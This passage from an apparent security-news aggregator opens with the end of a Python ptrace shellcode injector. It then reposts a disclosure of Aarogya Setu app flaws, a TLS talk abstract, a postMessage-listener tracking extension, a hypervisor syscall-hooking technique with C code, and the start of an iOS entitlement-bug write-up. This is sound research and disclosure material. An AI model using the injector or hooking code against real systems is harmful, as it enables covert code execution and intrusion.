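    libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(regs))
    rip = regs.regs[RIP_INDEX]
    for i, word in enumerate(chunk_words(SHELLCODE)):
        libc.ptrace(PTRACE_POKETEXT, pid,
                    ctypes.c_void_p(rip + i * 8), ctypes.c_void_p(word))
    libc.ptrace(PTRACE_DETACH, pid, None, None)  # target resumes at our code

if __name__ == "__main__" and len(sys.argv) > 1:
    inject(int(sys.argv[1]))
```

A real injector would also check each ptrace return value and restore the clobbered bytes if something goes wrong; this sketch only shows the attach/read-RIP/poke/detach skeleton.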
-
Aarogya Setu: The story of a failure

Elliot Alderson, May 6

In order to fight Covid-19, the Indian government released a mobile contact tracing application called Aarogya Setu. This application is available on the Play Store and 90 million Indians have already installed it.

Aarogya Setu - Apps on Google Play
Aarogya Setu is a mobile application developed by the Government of India to connect essential health services with the… play.google.com

This application is currently getting a lot of attention in India. In Noida, if people don't have the app installed on their phone, they can be imprisoned for up to 6 months or fined up to Rs 1,000.

No Aarogya Setu app? Pay Rs 1,000 fine or face 6 months jail in Noida
"If people download it instantly, we will let them go. We are doing this so that people take the order seriously and… indianexpress.com

Access to app internal files

On April 3, 2 days after the launch of the app, I decided to take a look at version 1.0.1 of the application. It was 11:54 pm and I spent less than 2 hours looking at it. At 1:27 am, I found that an activity called WebViewActivity was behaving weirdly. This activity is a webview and is, in theory, responsible for showing web pages like the privacy policy, for example.

AndroidManifest.xml in Aarogya Setu v1.0.1

The issue is that WebViewActivity was capable of doing a little bit more than that.

WebViewActivity in Aarogya Setu v1.0.1

As you can see, the onPageStarted method checked the value of the str parameter. If str:
- is tel://[phone number]: it will ask Android to open the dialer and pre-dial the number
- doesn't contain http or https: it does nothing
- otherwise: it opens a webview with the specified URI

As you can see, there is no host validation at all. So I tried to open an internal file of the application called FightCorona_prefs.xml by sending the following command.

As you can see in the following video, it worked fine!

Why is it a problem?
With only one click, an attacker can open any internal file of the app, including the local database used by the app, called fight-covid-db.

Ability to know who is sick anywhere in India

On May 4, I decided to push my analysis a little bit further and analysed version 1.1.1 of the app, which is the current version. The first thing I noticed is that the issue described previously had been fixed silently by the developers. Indeed, the WebViewActivity is no longer accessible from the outside; they removed the intent filters in the AndroidManifest.xml.

AndroidManifest.xml in Aarogya Setu v1.1.1

To continue my analysis, I decided to use the app on a rooted device. When I tried, I directly received this message.

I decompiled the app and found where this root detection was implemented. In order to bypass it, I wrote a small function in my Frida script.

The next challenge was to bypass the certificate pinning the app implemented, in order to be able to monitor the network requests made by the app. Once I had done that, I used the app and found an interesting feature.

In the app, you have the ability to know how many people did a self-assessment in your area. You can choose the radius of the area: 500 m, 1 km, 2 km, 5 km or 10 km. When the user clicks on one of the distances:
- their location is sent: see the lat and lon parameters in the header
- the chosen radius is sent: see the dist parameter in the URL and the distance parameter in the header

The first thing I noticed is that this endpoint returns a lot of info:
- Number of infected people
- Number of unwell people
- Number of people declared as bluetooth positive
- Number of self-assessments made around you
- Number of people using the app around you

Because I'm stupid, the 1st thing I tried was to modify the location to see if I was able to get information anywhere in India. The 2nd thing was to modify the radius to 100 km to see if I was able to get info with a radius which is not available in the app.
As you can see in the previous screenshot, I set my location to Mumbai and the radius to 100 km, and it worked!

What are the consequences?

Thanks to this endpoint, an attacker can know who is infected anywhere in India, in the area of his choice. I can know if my neighbour is sick, for example. Sounds like a privacy issue to me…

So I decided to play with it a little bit and checked who was infected in some specific places with a radius of 500 metres:
- PMO office: {"infected":0,"unwell":5,"bluetoothPositive":4,"success":true,"selfAsses":215,"usersNearBy":1936}
- Ministry of Defense: {"infected":0,"unwell":5,"bluetoothPositive":11,"success":true,"selfAsses":123,"usersNearBy":1375}
- Indian Parliament: {"infected":1,"unwell":2,"bluetoothPositive":17,"success":true,"selfAsses":225,"usersNearBy":2338}
- Indian Army Headquarters: {"infected":0,"unwell":2,"bluetoothPositive":4,"success":true,"selfAsses":91,"usersNearBy":1302}

Disclosure

49 minutes after my initial tweet, NIC and the Indian CERT contacted me. I sent them a small technical report. A few hours after that, they released an official statement. To sum up, they said "Nothing to see here, move on". My answer to them is:
- As you saw in the article, it was totally possible to use a different radius than the 5 hardcoded values, so clearly they are lying on this point and they know it. They even admit that the default value is now 1 km, so they made a change in production after my report.
- The funny thing is they also admit a user can get the data for multiple locations. Thanks to triangulation, an attacker can get the health status of someone with metre-level precision.
- Bulk calls are possible, my man. I spent my day calling this endpoint and you know it too.

I'm happy they quickly answered my report and fixed some of the issues, but seriously: stop lying, stop denying.

And don't forget folks: Hack the planet!

Sursa: https://medium.com/@fs0c131y/aarogya-setu-the-story-of-a-failure-3a190a18e34
-
In the RuhrSec 2020 #StayAtHome Edition, we present you with a selection of talks planned for RuhrSec 2020. If you enjoy the talk, we encourage you to make a donation to the non-profit organization DLRG Hattingen (https://hattingen.dlrg.de/spenden/) (PayPal available). The donation will be used to support the local youth department of the DLRG, which is the largest voluntary lifesaving organization worldwide.

---

RuhrSec is the annual English-speaking non-profit IT security conference with cutting-edge security talks by renowned experts. Due to the coronavirus, we decided to cancel RuhrSec 2020. Thanks to our amazing speakers, we are able to provide you with a selection of the planned talks in our RuhrSec 2020 #StayAtHome Edition anyway. https://www.ruhrsec.de/

---

RuhrSec 2020 #StayAtHome Edition Episode 1: Efficient Forward Security for TLS 1.3 0-RTT by Kai Gellert

Abstract. The TLS 1.3 0-RTT mode enables a client reconnecting to a server to send encrypted application-layer data in "0-RTT" ("zero round-trip time"), without the need for a prior interactive handshake. This fundamentally requires the server to reconstruct the previous session's encryption secrets upon receipt of the client's first message. The standard techniques to achieve this are session caches or, alternatively, session tickets. The former provides forward security and resistance against replay attacks, but requires a large amount of server-side storage. The latter requires negligible storage, but provides no forward security and is known to be vulnerable to replay attacks.

In this talk, we discuss the drawbacks of the current 0-RTT mode of TLS 1.3 and the security properties we would actually like to achieve. We then present a new generic construction of a session resumption protocol and show that it can immediately be used in TLS 1.3 0-RTT and deployed unilaterally by servers, without requiring any changes to clients or the protocol.
This yields the first construction that achieves forward security for all messages, including the 0-RTT data.

Biography. Kai Gellert is a PhD student at the chair of IT Security and Cryptography at the University of Wuppertal, where he is supervised by Tibor Jager. The focus of his research is the construction and security analysis of forward-secure 0-RTT protocols. His results are published at leading security and cryptography conferences such as Eurocrypt and the Privacy Enhancing Technologies Symposium.

Twitter: https://twitter.com/KaiGellert
-
postMessage-tracker

Made by Frans Rosén. Presented during the "Attacking modern web technologies" talk (Slides) at OWASP AppSec Europe back in 2018, but finally released in May 2020.

This Chrome extension monitors postMessage listeners by showing you an indicator of the number of listeners in the current window. It supports tracking listeners in all subframes of the window. It also keeps track of short-lived listeners and listeners enabled upon interactions.

You can also log the listener functions and locations to look through them at a later stage by using the Log URL option in the extension. This enables you to find hidden listeners that are only enabled for a short time inside an iframe.

It also shows you the interaction between windows inside the console and will specify the windows using a path you can use yourself to replay the message. It also supports tracking communication happening between different windows, using diffwin as sender or receiver in the console.

Features

- Supports Raven, New Relic, Rollbar, Bugsnag and jQuery wrappers and "unpacks" them to show you the real listener. Tries to bypass and reroute wrappers so the Devtools console will show the proper listeners:
  Using New Relic / After, with postMessage-tracker.
  Using jQuery / After, with postMessage-tracker.
- Allows you to set a Log URL inside the extension options to log all information about each listener to an endpoint by submitting the listener and the function (to be able to look through all listeners later). You can find the options in the Extension Options when clicking the extension in the chrome://extensions page.
- Supports anonymous functions. Chrome does not support stringifying anonymous functions; in the case of anonymous functions, you will see the bound-string as the listener.

Known issues

Since some websites could be served as XML with an XHTML namespace, the extension will also attach itself to plain XML files and will be rendered at the top of the XML.
This might confuse you if you look at XML files in the browser, as the complete injected script is in the DOM of the XML. I haven't found a way to hide it from real XML files while still supporting it for XHTML namespaces.

Sursa: https://github.com/fransr/postMessage-tracker
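The extension's core trick, observing message listeners by wrapping addEventListener before the page's own scripts run, can be sketched in a few lines. This is a simplified stand-alone model using a plain object in place of the real window, not the extension's actual code:

```javascript
// Simplified model of postMessage-listener tracking: wrap addEventListener
// so every "message" listener registration is recorded before it is added.
function makeTrackedTarget(target) {
  const listeners = [];
  const original = target.addEventListener.bind(target);
  target.addEventListener = function (type, fn, opts) {
    if (type === "message") listeners.push(fn); // record it, like the extension
    return original(type, fn, opts);
  };
  target.getMessageListeners = () => listeners.slice();
  return target;
}

// Stand-in for a window: a minimal EventTarget-like object.
const fakeWindow = makeTrackedTarget({
  _handlers: [],
  addEventListener(type, fn) { this._handlers.push([type, fn]); },
  dispatch(type, event) {
    this._handlers.filter(([t]) => t === type).forEach(([, fn]) => fn(event));
  },
});

fakeWindow.addEventListener("message", (e) => console.log("got:", e.data));
fakeWindow.addEventListener("click", () => {});

console.log("message listeners:", fakeWindow.getMessageListeners().length);
fakeWindow.dispatch("message", { data: "hello" });
```

The real extension injects its wrapper into every frame at document_start, which is what lets it catch the short-lived listeners mentioned above.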
-
Syscall Hooking Via Extended Feature Enable Register (EFER)

On December 28, 2018, by Aidan Khoury

Since the dawn of KVA Shadowing (KVAS), Microsoft's counterpart to Linux's KPTI, developed to mitigate the Meltdown vulnerabilities, hooking syscalls (among other potentially malicious things) has become increasingly difficult on Windows. Upon updating my virtualization toolset, which utilizes syscall hooking strategies to assist in control flow analysis, I had trouble adding support for any Windows version with KVAS enabled. This is due to Windows mapping the syscall handler KiSystemCall64Shadow into the kernel shadow page tables. So upon attempting to hook system calls using the LSTAR MSR, I found that the only way to do so was by manually adding my custom LSTAR system call handler to the shadow page tables using MmCreateShadowMapping.

This worked well up until the Windows 10 1809 update. Since the 1809 update, the pages of the shadow mapping code in the PAGE section of the kernel are discarded shortly after initialization. I am guessing that Microsoft caught this workaround and dealt with it by discarding the pages. There is, it seems, no way around this without bootstrapping the kernel.

After brainstorming possible solutions, I decided to take a shot at hooking using the Extended Feature Enable Register (EFER) in order to exit on each SYSCALL and subsequent SYSRET instruction and emulate their operations (you can find the definition of the EFER MSR in the Intel Software Developer's Manual, Volume 3A, under section 2.2.1 Extended Feature Enable Register). Now you're probably thinking, how is that possible? But the possibilities are nearly endless when you have a subverted processor on your hands! By setting the appropriate bits in the MSR Bitmap, you can control and mask the value of the SYSCALL Enable (or SCE) bit of the EFER MSR.
Referencing the Intel Software Developer's Manual, Volume 2B, under section 4.3 INSTRUCTIONS (M-U), we can clearly see how the SYSCALL instruction operates and notice we can take advantage of the EFER SCE bit (the AMD64 Architecture Programmer's Manual V3 r3.26 has a practically equivalent instruction reference on page 419 which some may find easier to follow). Taking from the Intel SDM, the SYSCALL instruction operation is as follows:

IF (CS.L ≠ 1) or (IA32_EFER.LMA ≠ 1) or (IA32_EFER.SCE ≠ 1)
    (* Not in 64-Bit Mode or SYSCALL/SYSRET not enabled in IA32_EFER *)
    THEN #UD; FI;
RCX ← RIP; (* Will contain address of next instruction *)
RIP ← IA32_LSTAR;
R11 ← RFLAGS;
RFLAGS ← RFLAGS AND NOT(IA32_FMASK);
CS.Selector ← IA32_STAR[47:32] AND FFFCH (* Operating system provides CS; RPL forced to 0 *)
(* Set rest of CS to a fixed value *)
CS.Base ← 0;       (* Flat segment *)
CS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *)
CS.Type ← 11;      (* Execute/read code, accessed *)
CS.S ← 1;
CS.DPL ← 0;
CS.P ← 1;
CS.L ← 1;          (* Entry is to 64-bit mode *)
CS.D ← 0;          (* Required if CS.L = 1 *)
CS.G ← 1;          (* 4-KByte granularity *)
CPL ← 0;
SS.Selector ← IA32_STAR[47:32] + 8; (* SS just above CS *)
(* Set rest of SS to a fixed value *)
SS.Base ← 0;       (* Flat segment *)
SS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *)
SS.Type ← 3;       (* Read/write data, accessed *)
SS.S ← 1;
SS.DPL ← 0;
SS.P ← 1;
SS.B ← 1;          (* 32-bit stack segment *)
SS.G ← 1;          (* 4-KByte granularity *)

We can see the first line of conditions that cause an Undefined Opcode Exception (#UD) contains a conditional check of the EFER SCE bit. Knowing that if EFER SCE is cleared we can cause a #UD exception, we now know we can VM-exit on every SYSCALL instruction using the Exception Bitmap. Though with every SYSCALL instruction there should be a subsequent SYSRET instruction inside the system call handler in order to resume execution back to the previous context.
SYSRET operates similarly to the SYSCALL instruction, and you can think of it as the little cousin of the IRET instruction. Taking from the Intel SDM again, the SYSRET instruction operation is as follows:

IF (CS.L ≠ 1) or (IA32_EFER.LMA ≠ 1) or (IA32_EFER.SCE ≠ 1)
    (* Not in 64-Bit Mode or SYSCALL/SYSRET not enabled in IA32_EFER *)
    THEN #UD; FI;
IF (CPL ≠ 0) OR (RCX is not canonical) THEN #GP(0); FI;
IF (operand size is 64-bit)
    THEN (* Return to 64-Bit Mode *)
        RIP ← RCX;
    ELSE (* Return to Compatibility Mode *)
        RIP ← ECX;
FI;
RFLAGS ← (R11 & 3C7FD7H) | 2; (* Clear RF, VM, reserved bits; set bit 2 *)
IF (operand size is 64-bit)
    THEN CS.Selector ← IA32_STAR[63:48]+16;
    ELSE CS.Selector ← IA32_STAR[63:48];
FI;
CS.Selector ← CS.Selector OR 3; (* RPL forced to 3 *)
(* Set rest of CS to a fixed value *)
CS.Base ← 0;       (* Flat segment *)
CS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *)
CS.Type ← 11;      (* Execute/read code, accessed *)
CS.S ← 1;
CS.DPL ← 3;
CS.P ← 1;
IF (operand size is 64-bit)
    THEN (* Return to 64-Bit Mode *)
        CS.L ← 1; (* 64-bit code segment *)
        CS.D ← 0; (* Required if CS.L = 1 *)
    ELSE (* Return to Compatibility Mode *)
        CS.L ← 0; (* Compatibility mode *)
        CS.D ← 1; (* 32-bit code segment *)
FI;
CS.G ← 1; (* 4-KByte granularity *)
CPL ← 3;
SS.Selector ← (IA32_STAR[63:48]+8) OR 3; (* RPL forced to 3 *)
(* Set rest of SS to a fixed value *)
SS.Base ← 0;       (* Flat segment *)
SS.Limit ← FFFFFH; (* With 4-KByte granularity, implies a 4-GByte limit *)
SS.Type ← 3;       (* Read/write data, accessed *)
SS.S ← 1;
SS.DPL ← 3;
SS.P ← 1;
SS.B ← 1;          (* 32-bit stack segment *)
SS.G ← 1;          (* 4-KByte granularity *)

We can see the first line of conditions that cause a #UD exception is the same as for the SYSCALL instruction. At this point we know we're good to start causing VM-exits and emulating system calls, but let's recap everything we know we have to do:

- Enable VMX.
- Setup VM-entry controls in VMCS to load the EFER MSR on VM entry.
- Setup VM-exit controls in VMCS to save the EFER MSR on VM exit.
- Setup the MSR Bitmap in VMCS to exit on reads and writes to the EFER MSR.
- Setup the Exception Bitmap in VMCS to exit on #UD exceptions.
- Set the SCE bit on EFER MSR read VM-exits.
- Clear (mask off) the SCE bit on EFER MSR write VM-exits.
- Handle the #UD exception to emulate either the SYSCALL or SYSRET instruction.

The next problem is detecting whether the #UD was caused by a SYSCALL or SYSRET instruction. For the sake of simplicity, reading opcodes from RIP is sufficient to determine what instruction caused the #UD. KVAS slightly complicates things however, so we need to handle this a little differently if the CR3 PCID indicates a user mode directory table base. There are of course more optimal methods than reading the instruction opcodes (e.g. hook the interrupt table itself, or use a toggle or counter to switch between handling SYSCALL or SYSRET if it's safe to assume nothing else will cause a #UD).

Emulating the SYSCALL and SYSRET instructions is as easy as just following the instruction operations outlined in the manual. The following code is just a basic emulation; I have purposely left out handling of compatibility and protected mode and the SYSRET #GP exception for simplicity:

//
// SYSCALL instruction emulation routine
//
static BOOLEAN
VmmpEmulateSYSCALL(
    IN PVIRTUAL_CPU VirtualCpu
    )
{
    X86_SEGMENT_REGISTER Cs, Ss;
    UINT64 MsrValue;

    //
    // Save the address of the instruction following SYSCALL into RCX and then
    // load RIP from MSR_LSTAR.
    //
    MsrValue = ReadMSR( MSR_LSTAR );
    VirtualCpu->Context->Rcx = VirtualCpu->Context->Rip;
    VirtualCpu->Context->Rip = MsrValue;
    VmcsWrite( VMCS_GUEST_RIP, VirtualCpu->Context->Rip );

    //
    // Save RFLAGS into R11 and then mask RFLAGS using MSR_FMASK.
    //
    MsrValue = ReadMSR( MSR_FMASK );
    VirtualCpu->Context->R11 = VirtualCpu->Context->Rflags;
    VirtualCpu->Context->Rflags &= ~(MsrValue | X86_FLAGS_RF);
    VmcsWrite( VMCS_GUEST_RFLAGS, VirtualCpu->Context->Rflags );

    //
    // Load the CS and SS selectors with values derived from bits 47:32 of MSR_STAR.
    //
    MsrValue = ReadMSR( MSR_STAR );
    Cs.Selector = (UINT16)((MsrValue >> 32) & ~3); // STAR[47:32] & ~RPL3
    Cs.Base = 0;            // flat segment
    Cs.Limit = (UINT32)~0;  // 4GB limit
    Cs.Attributes = 0xA9B;  // L+DB+P+S+DPL0+Code
    VmcsWriteSegment( X86_REG_CS, &Cs );

    Ss.Selector = (UINT16)(((MsrValue >> 32) & ~3) + 8); // STAR[47:32] + 8
    Ss.Base = 0;            // flat segment
    Ss.Limit = (UINT32)~0;  // 4GB limit
    Ss.Attributes = 0xC93;  // G+DB+P+S+DPL0+Data
    VmcsWriteSegment( X86_REG_SS, &Ss );

    return TRUE;
}

//
// SYSRET instruction emulation routine
//
static BOOLEAN
VmmpEmulateSYSRET(
    IN PVIRTUAL_CPU VirtualCpu
    )
{
    X86_SEGMENT_REGISTER Cs, Ss;
    UINT64 MsrValue;

    //
    // Load RIP from RCX.
    //
    VirtualCpu->Context->Rip = VirtualCpu->Context->Rcx;
    VmcsWrite( VMCS_GUEST_RIP, VirtualCpu->Context->Rip );

    //
    // Load RFLAGS from R11. Clear RF, VM, reserved bits.
    //
    VirtualCpu->Context->Rflags = (VirtualCpu->Context->R11
        & ~(X86_FLAGS_RF | X86_FLAGS_VM | X86_FLAGS_RESERVED_BITS)) | X86_FLAGS_FIXED;
    VmcsWrite( VMCS_GUEST_RFLAGS, VirtualCpu->Context->Rflags );

    //
    // SYSRET loads the CS and SS selectors with values derived from bits 63:48 of MSR_STAR.
    //
    MsrValue = ReadMSR( MSR_STAR );
    Cs.Selector = (UINT16)(((MsrValue >> 48) + 16) | 3); // (STAR[63:48]+16) | 3 (* RPL forced to 3 *)
    Cs.Base = 0;            // Flat segment
    Cs.Limit = (UINT32)~0;  // 4GB limit
    Cs.Attributes = 0xAFB;  // L+DB+P+S+DPL3+Code
    VmcsWriteSegment( X86_REG_CS, &Cs );

    Ss.Selector = (UINT16)(((MsrValue >> 48) + 8) | 3); // (STAR[63:48]+8) | 3 (* RPL forced to 3 *)
    Ss.Base = 0;            // Flat segment
    Ss.Limit = (UINT32)~0;  // 4GB limit
    Ss.Attributes = 0xCF3;  // G+DB+P+S+DPL3+Data
    VmcsWriteSegment( X86_REG_SS, &Ss );

    return TRUE;
}

You can simply call the SYSCALL and SYSRET emulation routines from your #UD handler, which also does the detection of what instruction caused the exception. Here is a quick example including code supporting KVAS:

#define IS_SYSRET_INSTRUCTION(Code) \
    (*((PUINT8)(Code) + 0) == 0x48 && \
     *((PUINT8)(Code) + 1) == 0x0F && \
     *((PUINT8)(Code) + 2) == 0x07)

#define IS_SYSCALL_INSTRUCTION(Code) \
    (*((PUINT8)(Code) + 0) == 0x0F && \
     *((PUINT8)(Code) + 1) == 0x05)

static BOOLEAN
VmmpHandleUD(
    IN PVIRTUAL_CPU VirtualCpu
    )
{
    UINTN GuestCr3;
    UINTN OriginalCr3;
    UINTN Rip = VirtualCpu->Context->Rip;

    //
    // Due to KVA Shadowing, we need to switch to a different directory table base
    // if the PCID indicates this is a user mode directory table base.
    //
    GuestCr3 = VmxGetGuestControlRegister( VirtualCpu, X86_CTRL_CR3 );
    if ((GuestCr3 & PCID_MASK) != PCID_NONE) {
        OriginalCr3 = ReadCr3( );
        WriteCr3( PsGetCurrentProcess( )->DirectoryTableBase );
        if (IS_SYSRET_INSTRUCTION( Rip )) {
            WriteCr3( OriginalCr3 );
            goto EmulateSYSRET;
        }
        if (IS_SYSCALL_INSTRUCTION( Rip )) {
            WriteCr3( OriginalCr3 );
            goto EmulateSYSCALL;
        }
        WriteCr3( OriginalCr3 );
        return FALSE;
    } else {
        if (IS_SYSRET_INSTRUCTION( Rip ))
            goto EmulateSYSRET;
        if (IS_SYSCALL_INSTRUCTION( Rip ))
            goto EmulateSYSCALL;
        return FALSE;
    }

    //
    // Emulate SYSRET instruction.
    //
EmulateSYSRET:
    LOG_DEBUG( "SYSRET instruction => 0x%llX", Rip );
    return VmmpEmulateSYSRET( VirtualCpu );

    //
    // Emulate SYSCALL instruction.
    //
EmulateSYSCALL:
    LOG_DEBUG( "SYSCALL instruction => 0x%llX", Rip );
    return VmmpEmulateSYSCALL( VirtualCpu );
}

If it has been determined that a SYSCALL or SYSRET instruction has caused the #UD exception, then just skip injecting the exception into the guest, as the exception was caused intentionally, and resume back to the guest gracefully. Example:

case X86_TRAP_UD: // INVALID OPCODE FAULT
    LOG_DEBUG( "VMX => #UD Rip = 0x%llX", VirtualCpu->Context->Rip );

    //
    // Handle the #UD, checking if this exception was intentional.
    //
    if (!VmmpHandleUD( VirtualCpu )) {
        //
        // If this #UD was found to be unintentional, inject a #UD interruption into the guest.
        //
        VmxInjectInterruption( VirtualCpu, InterruptVectorType, VMX_INTR_NO_ERR_CODE );
    }
    // continued code flow then return back to guest....

So how can we use this effectively? Well, in the SYSCALL emulation handler we have access to the guest registers, which contain the system call index and associated parameters according to the x64 ABI in use, so we have free rein to do whatever we want with this!

Copyright protected by Digiprove © 2019. All Rights Reserved.

Sursa: https://revers.engineering/syscall-hooking-via-extended-feature-enable-register-efer/
-
psychicpaper

Siguza, 01. May 2020

"Psychic Paper"

These aren't the droids you're looking for.

0. Introduction

Yesterday Apple released iOS 13.5 beta 3 (seemingly renaming iOS 13.4.5 to 13.5 there), and that killed one of my bugs. It wasn't just any bug though, it was the first 0day I had ever found. And it was probably also the best one. Not necessarily for how much it gives you, but certainly for how much I've used it for, and also for how ridiculously simple it is. So simple, in fact, that the PoC I tweeted out looks like an absolute joke. But it's 100% real.

I dubbed it "psychic paper" because, just like the item by that name that Doctor Who likes to carry, it allows you to get past security checks and make others believe you have a wide range of credentials that you shouldn't have.

In contrast to virtually any other bug and any other exploit I've had anything to do with, this one should be understandable without any background knowledge in iOS and/or exploitation. In that spirit, I'll also try and write this post in a manner that assumes no iOS- or exploitation-specific knowledge. I do expect you however to loosely know what XML, public key encryption and hashes are, and understanding C code is certainly a big advantage. So strap in for the story of what I'll boldly claim to be the most elegant exploit for the most powerful sandbox escape on iOS yet.

1. Background

1.1 Technical background

As a first step, let's look at a sample XML file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE figment-of-my-imagination>
<container>
    <meow>value</meow>
    <whatever/>
</container>
<!-- herp -->
<idk a="b" c="d">xyz</idk>

The basic concept is that <tag> opens a tag, </tag> closes it, and stuff goes in between. That stuff can be either raw text or more tags. Empty tags can be self-closing like <tag/>, and they can have attributes like a="b" as well, yada yada.
There are three things in the above file that go beyond just basic tags:

- <?...?> - Tags starting and ending with question marks, so-called "processing instructions", are treated specially.
- <!DOCTYPE ...> - Tags starting with !DOCTYPE are, well, "document type declarations" and are treated specially as well.
- <!-- --> - Tags starting with <!-- and ending with --> are comments, and they plus their contents are ignored.

The full XML specification contains a lot more, but a) that's irrelevant to us, and b) nobody should ever be forced to read that.

Now, XML is horrible to parse for reasons this XKCD illustrates beautifully:

So yeah, you can construct <mis>matched</tags>, <attributes that="are never closed>, even <tags that are never closed, maybe a tag like this: <!>, the list simply doesn't end. This makes XML a format that's excruciatingly hard to parse correctly, which will become relevant in a bit.

Now building on XML, we have "property list", or "plist" for short: yet another general-purpose format for storing serialised data. You have arrays, dictionaries with key -> value pairs, strings, numbers, etc. Plist files exist in a bunch of different forms, but the only two that you'll realistically see in an Apple ecosystem are the "bplist" binary format, which is out of scope for this post, and the XML-based format.
A valid XML plist can look something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>OS Build Version</key>
    <string>19D76</string>
    <key>IOConsoleLocked</key>
    <false/>
    <!-- abc -->
    <key>IOConsoleUsers</key>
    <array>
        <dict>
            <key>kCGSSessionUserIDKey</key>
            <integer>501</integer>
            <key>kCGSessionLongUserNameKey</key>
            <string>Siguza</string>
        </dict>
    </array>
    <!-- def -->
    <key>IORegistryPlanes</key>
    <dict>
        <key>IODeviceTree</key>
        <string>IODeviceTree</string>
        <key>IOService</key>
        <string>IOService</string>
    </dict>
</dict>
</plist>

Plist files are used all throughout iOS and macOS for configuration files, package properties, and last but not least as part of code signatures.

So: code signatures. When a binary wants to run on iOS, a kernel extension called AppleMobileFileIntegrity (or "AMFI") requires it to have a valid code signature, or else it will be killed on the spot. What this code signature looks like isn't important for us, all that matters is that it is identified by a hashsum. This hash can be validated in one of two ways:

- It can be known to the kernel ahead of time, which is called an "ad-hoc" signature. This is used for iOS system apps and daemons, and the hash is simply checked against a collection of known hashes directly in the kernel.
- It needs to be signed with a valid code signing certificate. This is used for all 3rd party apps, and in this scenario, AMFI calls out to the userland daemon amfid to have it run all the necessary checks.

Now, code signing certificates come in two forms:

- The App Store certificate. This is held only by Apple themselves, and in order to get signed this way, your app needs to pass the App Store review.
- Developer certificates. This can be the free "7-day" certificates, "regular" developer certificates, or enterprise distribution certificates.
In the latter case, the app in question will also require a “provisioning profile”, a file that Xcode (or some 3rd party software) can fetch for you, and that needs to be placed in your App.ipa bundle at Payload/Your.app/embedded.mobileprovision. This file is signed by Apple themselves, and specifies the duration, the list of devices, and the developer accounts it is valid for, as well as all the restrictions that should apply to the app.

And now a quick look at app sandboxing and security boundaries: in a standard UNIX environment, pretty much the only security boundaries you get are UID checks. Processes of one UID can’t access resources of another UID, and any resource deemed “privileged” requires UID 0, i.e. “root”. iOS and macOS still use that, but also introduce the concept of “entitlements”. In layman’s terms, entitlements are a list of properties and/or privileges that should be applied to your binary. If present, they are embedded in the code signature of your binary in the form of an XML plist file, which might look like this:

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>task_for_pid-allow</key>
    <true/>
</dict>
</plist>

This would mean that the binary in question “holds the task_for_pid-allow entitlement”, which in this specific case means it is allowed to use the task_for_pid() mach trap, which is otherwise not allowed at all (at least on iOS). Such entitlements are checked all throughout iOS and macOS, and there are well upwards of a thousand different ones in existence (Jonathan Levin has built a big catalogue of all the ones he could find, if you’re curious). The important thing is just that all 3rd party apps on iOS are put in a containerised environment where they have access to as few files, services and kernel APIs as possible, and entitlements can be used to poke holes in that container, or remove it entirely. This presents an interesting problem.
With iOS system apps and daemons, Apple is the one signing them, so they wouldn’t put any entitlements on there that they don’t want the binaries to have. The same goes for App Store apps, where Apple is the one creating the final signature. But with developer certificates, the signature on the binary is created by the developers themselves, and Apple merely signs the provisioning profile. This means that the provisioning profile must whitelist the entitlements the developer is allowed to use, or the iOS security model is toast right away. And indeed, if you run strings against a provisioning profile, you will find something like this:

<key>Entitlements</key>
<dict>
    <key>keychain-access-groups</key>
    <array>
        <string>YOUR_TEAM_ID.*</string>
    </array>
    <key>get-task-allow</key>
    <true/>
    <key>application-identifier</key>
    <string>YOUR_TEAM_ID.com.example.app</string>
    <key>com.apple.developer.team-identifier</key>
    <string>YOUR_TEAM_ID</string>
</dict>

Compared to the over 1000 entitlements in existence, this list is extremely short, with the only two functional entitlements being keychain-access-groups (related to credentials) and get-task-allow (allowing your app to be debugged). Not a whole lot to work with.

1.2 Historical background

Back in fall 2016 I wrote my first kernel exploit, which was based on the infamous “Pegasus vulnerabilities”. Those were memory corruptions in the XNU kernel in a function called OSUnserializeBinary, which is a subordinate of another function called OSUnserializeXML. These two functions are used to parse not exactly XML data, but rather plist data - they are the way of parsing plist data in the kernel. Given the vulnerabilities I had just written an exploit for, and the still janky-looking code those two functions consisted of, in January 2017 I began looking through them in the hopes of finding further memory corruption bugs. At the same time, I was in the process of figuring out how to build an iOS app without Xcode.
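Conceptually, the check that stands between a developer-signed app and arbitrary entitlements is simple: everything the signature claims must appear in the profile's whitelist. A minimal sketch (the function name and structure are our own illustration, not Apple's code; the keys come from the profile excerpt above):

```python
# Entitlement keys taken from the provisioning profile excerpt above;
# the function name and structure are made up for illustration.
PROFILE_ALLOWED = {
    'keychain-access-groups',
    'get-task-allow',
    'application-identifier',
    'com.apple.developer.team-identifier',
}

def profile_permits(requested):
    """True iff every requested entitlement is whitelisted by the profile."""
    return set(requested) <= PROFILE_ALLOWED

print(profile_permits({'get-task-allow'}))       # True
print(profile_permits({'task_for_pid-allow'}))   # False
```

The catch, as we're about to see, is that "the entitlements the signature claims" depends entirely on which parser you ask.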
Partly because I wanted to understand what’s really going on under the hood, and partly because I just hate GUIs for development, especially when you Google how to do something, and the answer is a series of 17 “click here and there”s that are no longer valid because all the GUI stuff moved somewhere else in the last update. So I was getting a provisioning profile via Xcode every 7 days, I’d build the binary of my app manually with xcrun -sdk iphoneos clang, I’d sign it myself with codesign, and I’d install it myself with libimobiledevice’s ideviceinstaller. It was this combination, as well as probably a good portion of dumb luck, that made me discover the following bug, and excitedly tweet about it: (Thanks for digging that up, Emma! :D)

2. The bug

In an informal sense, it’s clear what it means for a binary to hold an entitlement. But how do you formally specify that? What would code look like that takes as input a process handle and an entitlement name, and just returns a boolean saying whether the process does or does not have that entitlement?
Luckily for us, XNU has precisely such a function in iokit/bsddev/IOKitBSDInit.cpp:

extern "C" boolean_t
IOTaskHasEntitlement(task_t task, const char * entitlement)
{
    OSObject * obj;
    obj = IOUserClient::copyClientEntitlement(task, entitlement);
    if (!obj) {
        return false;
    }
    obj->release();
    return obj != kOSBooleanFalse;
}

